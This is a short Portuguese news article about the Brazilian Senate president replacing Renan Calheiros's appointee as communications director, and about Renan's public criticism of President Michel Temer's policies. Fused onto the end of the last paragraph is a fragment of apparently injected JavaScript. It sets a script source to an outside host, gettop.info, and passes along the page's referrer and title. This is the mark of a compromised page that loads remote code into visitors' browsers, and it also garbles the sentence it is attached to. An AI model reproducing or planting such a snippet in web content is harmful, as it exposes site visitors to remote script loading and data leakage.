Renan começa a perder espaço no Senado

O presidente do Senado, Eunício de Oliveira (PMDB-CE) exonerou nesta segunda-feira (3) Virgínia Galvez, indicada por Renan Calheiros (PMDB-AL), da direção da Secretaria de Comunicação. Para seu lugar, Eunício escolheu Ângela Brandão. As decisões devem ser publicadas no Diário do Senado de amanhã (terça, 4)

Ângela é do quadro efetivo de funcionários do Senado, assim como Virgínia. A nova diretora de comunicação da Casa durante muito tempo ancorou o programa Cidadania. Além de comunicadora, ela é cantora e acaba de retornar do Chile, onde fez um doutorado.

Nova oposição

Protagonista da política brasileira há décadas, o ex-presidente do Senado Renan Calheiros (PMDB-AL) começa a perder espaço no Legislativo. Pelo menos aparentemente. Atualmente, o cacique é considerado um crítico do governo Michel Temer – a quem ajudou a chegar na presidência da República chancelando o impeachment de Dilma Rousseff.

Neste domingo, Renan publicou um vídeo em suas redes sociais fazendo críticas a Temer. Segundo o ex-presidente do Senado, “a sansão presidencial da terceirização irrestrita e a insistência do governo em fazer uma reforma da previdência que pune trabalhadores e o nordeste, significa dizer que o governo continua errático”, afirmou Renan. “E quem não ouve, erra sozinho”, alertou.

Renan já tinha criticado também o aumento de impostos e as iniciativas econômicas de Temer.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário